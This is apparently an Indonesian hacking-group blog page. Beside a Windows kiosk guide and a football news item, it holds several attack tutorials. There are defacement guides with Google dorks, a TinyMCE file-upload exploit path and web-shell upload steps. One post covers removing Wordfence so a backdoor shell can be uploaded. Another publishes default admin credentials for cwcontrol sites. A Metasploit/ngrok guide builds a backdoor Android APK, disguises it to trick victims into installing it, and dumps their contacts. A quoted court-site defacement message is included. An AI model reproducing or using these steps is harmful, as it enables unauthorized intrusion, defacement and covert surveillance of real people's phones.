Palembang Cyber Team

Lets Learn Networking To Gether

Jumat, 10 Januari 2020

Cara Set Up Mode Kiosk Pada Windows 10

Januari 10, 2020

Mungkin Bagi Sebagian Anda Ada Yang Belum Tau Apa Itu Kiosk


KIOSK Adalah Fitur Yang Terdapat Pada Windows 10, yang fungsinya kalian hanya akan dapat menjalankan satu (1) aplikasi yang terdapat pada computer / laptop anda


Langkah - langkah Untuk Mengaktifkan Mode Kiosk Pada Windows 10

1. Klik Start  -  Setting






2. Setelah Membuka Setting  -  klik Navigasi Account 



3. Pilih Menu Family and Other User



4. Setelah Membuka Menu Family and Other User  -  Klik Menu Assigned Access


5. Setelah Membuka Assigned Access  -  klik  Get Started  - Ketik Kiosk pada collom



6. Jika Sudah Klik Next Dan Anda tinggal Mengaktifkan Mode Kiosk Nya


selamat Mencoba






Kamis, 09 Januari 2020

Dilepas Sriwijaya FC, Zulkifli Syukur Langsung Diperkenalkan Tim Liga 1

Januari 09, 2020

Sriwijaya FC tak lagi menggunakan jasa Zulkifli Syukur. Pemain berposisi sebagai fullback kanan ini sudah dilepas manajemen Laskar Wong Kito –julukan Sriwijaya FC-.
Sebagaimana diketahui Zulkifli Syukur merupakan pemain dengn status pinjaman dari PSM Makassar. Dia didatangkan Sriwijaya FC satu paket bersama gelandang Hendra Ridwal dalam mengarungi putaran kedua Liga 2 musim 2019.
Namun sayang Zulkifli Syukur gagal hantarkan Sriwijaya FC promosi ke Liga 1 musim 2020. Alhasil klub kebanggaan masyarakat Sumsel kembali berlaga di Liga 2 musim ini.
Info berkembang jika Zulkifli Syukur menjadi pemain dengan gaji tertinggi selama perkuat SFC –singkatan Srwijaya FC. Lantas bagaimana nasib Zulkifli Syukur setelah tak lagi dimaksimalkan Sriwijaya FC.



Info beredar jika Zulkifli Syukur kini kembali berseragam PSM Makassar kontestan Liga 1 2020. Bahkan mantan pemain tim nasional ini sudah diperkenalkan saat PT Persaudaraan Sepakbola Makassar (PSM) selaku pengelola PSM Makassar melakukan jumpa pers terkait perkenalan pemain baru, Rabu (8/1/2020) kemarin.
Zulkifli Syukur tidak sendiri. Dia bersama tujuh pemain baru PSM Makassar lainya diperkenalkan. Mereka adalah Osas Saha Marvelous, Giancarlo Lopes Rodriguez, Miswar Saputra, Ahmad Agung, Leo Guntara, dan dua pemain PSM yang sempat dipinjamkan Wasiat Hasbullah, dan Saiful Samsuddin.
“Saya ingin ucapkan terima kasih untuk Pak Appi, dan Coach. Ini adalah sebuah apreasiasi yang besar bagi saya, dan saya harap semoga di tahun ini kita semua bisa mengharapkan apa kita harap di tahun ini,” ujar Zulkifli Syukur.

Pemain 35 tahun ini berharap agar pemain baru ini bisa saling berkerjasama dengan baik untuk mengarungi Shopee Liga 1 musim 2020.
“Saya juga mengharapkan untuk pemain-pemain yang baru bergabung bisa sama-sama saling membantu agar bisa mecapai proses itu,” pungkas Zulkifli Syukur. (nto)


Deface Methode Tiny_Mce File Upload Shell

Januari 09, 2020

Deface POC Plugin Tiny_Mce 


DORK : inurl:/tiny_mce/plugins/openmanager/php/
              inurl:/tiny_mce/plugins/
              inurl:/tiny_mce/plugins/openmanager/

{Kembangin Lagi DorkNya Bro} 
CSRF : Download Disini  AMBIL DISINI 

EXPLOIT : http://sites/[path]/openmanager/php/fileactions.php?s=uploadfile


Step By Step

1. Kamu Dorking Pake Dork Diatas Atau Pakai Dork Hasil Kamu




Setelah Dorking Pilih Web Nya,

2.  Lalu Masukan Exploit Nya


maka tampilan Nya Akan Seperti Itu, Copy Link Nya lalu Paste Ke CSRF nya


3. Buka CSRF nya


lalu Pilih Shell dan Upload Shell Nya

4. Letak Shell Pada [path]/images


setelah upload shell tinggal kalian index di public_html


GOOD BYE




Rabu, 01 Januari 2020

Subdomain Pengadilan Negeri Martapura ( Sumatra Selatan ) Di Retas Hacker

Januari 01, 2020


Subdomain Pengadilan Negeri Martapura [ http://eskum.pn-martapura.go.id/ ] Kabupaten Okutimur ( Sumatra Selatan ) Di Jahili Hacker Pada Saat Malam Tahun Baru 2020.



Pelaku Hacker Dengan Nick MR-X666X Berhasil Menembus Keamanan Situs Subdomain Pengadilan Negeri Martapura ( Oku timur ), Sampai Saat Ini Belum Di Ketahui Apa Motif Dari Peretasan Ini.


[| HACKED BY MR-X666X |] [| #BLACKCODERSANONYMOUS #SEVENGHOSTTEAM |]

~[| LOVE YOU ALL MEMBER BLACK CODERS ANONYMOUS AND SEVEN GHOST TEAM |]~ ~[[| HAPPY NEW YEARS BOYS AND GIRL, SEX YOUR GIRL OR YOUR BOYS NOW WUHU |]]~ ~~[[[| WE ARE GHOST IS ALWAYS PARTY IN YOUR SERVER |]]]~~ ~[]| WE ARE SEVEN GHOST TEAM |[]~ MR-X666X | GHOSTSHADOW | ./K1TSUN3-6H057 | B-ROSE666 | ./K4IZ3N-6H05T Z3R0H1D3N | SEA-GHOST | K4TSUY4-GH05T | L4ZYXPL0I7 | TAMPANSKY-ID ~[] MY BEST FAMILY FRIENDLY CORPORATION []~ JRB | ./MR.L3RBI-404 | XMRCOLD | 6HOSTHERE502 | VIP3RGHOST | S1EGE MAURITANIA ATTACKER | ./TERRORIST_DZ | ~H1D3 | ANIS_JOKER_DZ | VENOM_X_HUNT3R GBS AREMIEY | HAX STROKE | TERRORIST_DZ | VIRUSA WORM | DR_SAMIM | RAKA 3R00T MAN REZPECTOR | ANONXOXTN | V0RT3X | MR.DOMOZ | MAURIITANIA K!LL3R | NA5ET'Z EXTAZY007 | L'APOCA-DZ | BLACK CRACKER | HAXOR TR0JAN | MR.AJWORD | X-WANTED PSYCO_HACKER | TITOSFAXIENO | STINGERBYTE | GHOSTRALIA | G-AVOX | M0RTUSS BILLGATE | M-C0D3R | N0NAME-HAX0R | RUMMYKHAN | DONNAZMI | TH3_R3B0RN DON MAVERICK REVCREW | SIMSIMI | LARRY/SYAHRUL | MR.4NGG3R | REX4 PIR4T3CYB3R | RESMUS313 | RIY-GHOST | RK666HOST | ./TW1G PAWN0 | EVILSCYBER | ./TUANDESTROY | TU4N B4DUT ~~~~~~[] GREETZ TO ALL BEST MEMBER []~~~~~~ [|  MAURITANIA HACKERS TEAM | ANON GHOST TEAM | GHOST SQUAD HACKERS | BLACK CODERS ANONYMOUS | JRB | PHANTOMGHOST | BLOODSEC INTERNATIONAL | BLOOD SECURITY HACKERS | GHOST SECURITY HACKERS | SILENT GHOST TEAM | GHOST XPLO CODE PARTY | ANON ROZ HACKERS | CREW BUITENZORG SYNDICATE | BLACK CODER CRUSH | AN0N 3XPLOITER | ANONCODERS_TEAM'S | ANON GHOST SECURITY | CANTIX CREW | BANYUMAS CYBER TEAM | BALI BLACK HAT | CAN7IK XPLOIT | INDONESIA GOVERNMENT |]


Kira-kira Seperti Itu Bentuk Pesan Yang Tertulis Pada Laman Resmi Situs Pengadilan Negeri Martapura Yang Di retas


#Situs Pengadilan Negeri Mertapura Di Retas
#Hacker
#Deface

Jumat, 27 Desember 2019

Cara Mengatasi 403 Saat Upload Shell Backdoor Pada Wordpress

Desember 27, 2019
Cara Mengatasi 403

                   [ Wordfence Security ]

Cara Mengatasi 403 Saat Ingin Upload Shell Backdoor Pada Wordpress




Anda Binggung Saat Ingin Upload Shell Tapi Gagal Dikarnakan oleh Wordfence Security



Langkah Yang Harus Anda Lakukan Adalah Sebagai Berikut


1. Anda Masuk Dashboard Admin, Lalu pilih Plugins WORDFENCE



2. Setelah Membuka Plugin Wordfence, Anda Tandai Plugin Tersebut



3. Setelah Anda Tandai, Klik Hapus Pada Menu Di Bawah Plugin



Jika Sudah Dihapus Anda Tinggal Upload Shell Anda





Dan Hasilnya Tidak Akan Forrbiden Lagi
















Seputar-METASPLOIT

Desember 27, 2019
Mr.p3mu14



Assalamualaikum wr.wb

Oke , gw di sini akan menjelaskan seputar METASPLOIT tapi yang di termux / termos kalo gw nyebut nya ;v , bukan yg di cmd or kali Linux ya .

Yang pertama kita harus tau dulu apa & fungsi dari METASPLOIT  .

Dikutip dari Wikipedia
Metasploit adalah sebuah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan signature IDS. Gw mengambil kesimpulan dari kutipan di atas bahwa METASPLOIT dapat di gunakan untuk menyadap hp tanpa menyentuh hp korban , jadi kita meremote hp korban jarak jauh (kita bisa kendalikan hp korban ) .
Sebelum lebih jauh ni , jika hp kalian tidak root / tidak memiliki akses root kalian nga akan bisa menggunakan METASPLOIT  secara penuh/seluruh jadi METASPLOIT ini sangat banyak sekali fitur" nya nah jika kalian belum root kalian hanya bisa menggunakan beberapa tools saja.


Oke sekarang tahap penginstalan METASPLOIT 
Cara nya gampang bet .
Pertama kalian harus ada yang nama nya termux ya ,kalian bisa download di play store. Kalo gw pake versi lama.
nih yang mau termux versi lama Touch me

Kalo udh install & tunggu proses nya sampe selesai .

Next ,ikutin command berikut untuk penginstalan METASPLOIT 

$apt update && apt upgrade -y
$pkg install root-repo
$pkg install unstable-repo
$pkg install x11-repo
$pkg install metasploit
$pkg install pv

Tanpa "$" ya , player termos past tau lah


Bang di sini ko pv ?
Jadi gw suruh install pv itu untuk menjalankan script gw ntar , kalo pv nya ga di install pun METASPLOIT  nya masih tetep jalan , tapi kalian nga bisa pake tools gw .

Oke coba kalian masukan command
$msf consoule

Kalo muncul logo METASPLOIT nya berarti kalian dah berhasil install METASPLOIT nya . Jika terlihat ada yang merah" itu gpp .

Jika sudah terinstall kalian bisa pake METASPLOIT nya secara manual tapi cara manual itu agak ribet pengoperasian nya bagi yang udh plo mah pasti gampang tapi bagi yg pemula itu ribet bet dah .

Cerita sedikit nih , gw dulu dah lumayan lama sih mainan METASPLOIT , tapi pada awalnya itu susah nya minta ampun mulai dari nga terkoneksi lah macem" deh . Gw dah cari tools nya dulu itu nga ada sama sekali yang ada script METASPLOIT nya , lah gw pikir kan termux sudah menyediakan METASPLOIT nya knp harus pake script dari luar kan gtu pikir saya. Maka dari itu saya membuat tools menjalankan METASPLOIT secara gampang (gapake ribet ) .


Jadi kalo kalian dah punya METASPLOIT dari luar nih yg cara nginstal nya beda sama gw maka script gw itu ga bakal jalan , jadi kalo kalian nginstal METASPLOIT dari luar maka METASPLOIT itu akan berada di dalam folder nah itu penyebab nya .oke langsung saja ke penginstalan tools nya .

Tapi sebelum itu kita butuh ngrok untuk menyamakan jaringan kita dengan korban inget ngrok ini sangat penting , kalian bisa cari di google cara nginstal ngrok / bisa ke web nya langsung / bisa liat di sini;v

$cd
$apt install wget
$wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip -O ngrok.zip
$ unzip ngrok.zip

Oke itu udh kita ekstrak ngrok nya ,tapi kita blm bisa pake ,kita harus masukin token dari ngrok nya dulu , dengan cara daftar kan akun anda di web resmi ngrok
https://ngrok.com/
Setelah daftar dan masuk ,salin perintahnya yg nomor 3 ,itu code token kalian ,.agar mudah untuk menyalinnya gunakan mode desktop pada crome.
Setelah di salin dan di tempel di termux ,.hidupkan hostpot terlebih dahulu ,lalu coba 

$./ngrok tcp 4444


Kalo online berarti sukses .
Jadi di sini saya membuat tools untuk mempermudah menjalankan metasploit sebenarnya tanpa tools juga bisa tetapi kalian akan pusing karena ,jadi saya permudah dengan membuat tool ini .
Oke ,exit semua dari semua sesi .
Kita install tools nya terlebih dahulu.

$pkg install git
$git clone https://github.com/ArifHack/ArifHack
$cd ArifHack
$sh payload.sh
Nah lanjut ke pengoperasian METASPLOIT melalui tools ini 

Pertama kalian pilih no 1 

Setelah nomor satu akan di suruh masukan local port
Nah itu di dapet  dari ngrok.
Jadi buka sesi baru ,ketikkan perintah 

$./ngrok tcp 4444
(4444)itu bebas ya asal 4 angka gw sering pake yg 4444 .
Nah local port itu di isi sesuai dengan angka itu misal tcp 5555 ya berarti di isi 5555,faham sampe sini kan ? 

Oke saya anggap faham y

Kemudian akan di suruh masukan lhost .
Lhost ini jga di dapet dari ngrok .caranya:
Balik ke sesi ngrok tadi ,di line 


forwading         tcp://0.tcp.ngrok.oi
Nah yg kita ambil hanya "0.tcp.ngrok.oi" tanpa tanda kutip salin aja yg itu ,setelah di salin buka sesi baru lagi ,dan ketik
$ping (tempel di sini)

Jadi hasil nya akan seperti ini
$ping 0.tcp.ngrok.oi ,lalu enter
Nanti akan muncul IP ngrok nya yg di dalam tanda kurung salin IP tersebut ,
Kemudian kembali lagi ke sesi metasploit nya
Dan pastekan di lhost nya , kemudian enter
Kemudian Lport ,ya Lport jga di dapet dari ngrok ,cara nya .:
Di line 
forwading         tcp://0.tcp.ngrok.oi:(disini akan ada nomor 5 digit )


Nah nomor 5 digit tersebut lah yg di masuk an ke Lport nya
Setelah sudah  ,akan di suruh memasukan nama virus backdor nya ini bebas ya tapi jgn pake spasi
Kemudian dia akan membuat virus backdoor nya secara otomatis
Dan cek di internal kalian apakah ada virus tersebut.
Dan bila proses tadi telah selesai dan virus udh ada ,anda akan ditanya ,anda jawab y saja .
Dan secara otomatis akan memulai menjalankan metasploit nya ,nah di sini kita stay aja .
(Catatan:ngrok harus tetap online)
Jgn di apa" in
Nah kita kita tinggal membagikan apk virus nya tadi ke target kita ,bagai mana pun cara nya agar si target menginstal virus tersebut ,kalo gw sih gw iming" in apk pendownload an simontok versi terbaru nya ,karena kan simontok ngk di izinkan si google play store jadi suruh dia mati in ke amanan google play store nya ,nah kalo udh install dan buka akan terkoneksi di metasploit kita tadi .
Akan ada tulisan open sesi 1
Nah setelah itu akan muncul
meterpreter >

nah seperti itu ,itu tanda nya kita udh bisa exploit hp target .
Bila tidak muncul
Meterpreter>
Suruh target klik icon itu lagi 1-3kali saja jgn banyak"
Dan kita tunggu sampai keluar
Meterpreter> nya
Bila sudah .
Ketik help saja lalu enter

Dan silakan di baca command nya dan fungsi nya .

Misalkan ingin melihat hasil nya
Buka sesi baru atau di sesi ping tadi jga gpp
Ketik:
$cd ArifHack
$ls
Dan lihat ada apa aja di sana
Contoh gw dump contacts


Oke jika udh seperti gambar di atas tinggal enter dan liat hasil nya ,
Kesulitan dari METASPLOIT adalah gmna cara nya bikin si korban install apk backdoor dari kita / membuat si korban ga curiga bahwa apk itu berbahaya , ngerti ya maksud nya .

Oke sampai disini dulu untuk kali ini. ,bila ada yg kurang faham bisa tinggal kan komentar nya

Wassalamualaikum wr.wb


Rabu, 25 Desember 2019

Deface Poc cwcontrol default user/password

Desember 25, 2019

Default User dan Password CMS Channel Wide Computer

# Dork : inurl:/cwcontrol
               intext:"design by channel wide                                     computer"

# Exploit : /cwcontrol


# user           : admin
# password : cw774411



Step By Step

1. Dorking Menggunakan Dork di atas atau hasil mu sendiri


Pilih Target Yang Ingin di Eksekusi


2. Masukan exploit nya. Maka dia akan automatis ke login admin


Isi user name Dan password menggunakan admin / cw774411

Jika vuln, akan masuk ke dashboard

3. Anda akan masuk dashboard admin




Setelah masuk dashboard kalian bebas melakukan apapun yang kalian mau



#happy hacking
#deface
#cwcontrol
#Channel Wide Computer
Deface cwcontrol